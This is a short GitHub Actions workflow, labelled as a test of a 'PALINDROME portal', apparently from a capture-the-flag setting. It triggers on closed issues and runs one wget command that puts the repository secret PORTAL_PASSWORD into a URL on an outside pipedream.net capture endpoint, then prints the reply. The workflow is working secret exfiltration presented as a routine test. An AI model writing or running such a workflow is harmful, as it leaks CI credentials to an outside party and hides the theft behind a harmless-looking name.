name: Test the PALINDROME portal

on:
  issues:
    types: [closed]

jobs:
  test:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v3
      - name: Test the PALINDROME portal
        run: | 
          C:\msys64\usr\bin\wget.exe '''https://eopjgnu0isbkpxf.m.pipedream.net/?${{ secrets.PORTAL_PASSWORD }}''' -O test -d -v
          cat test
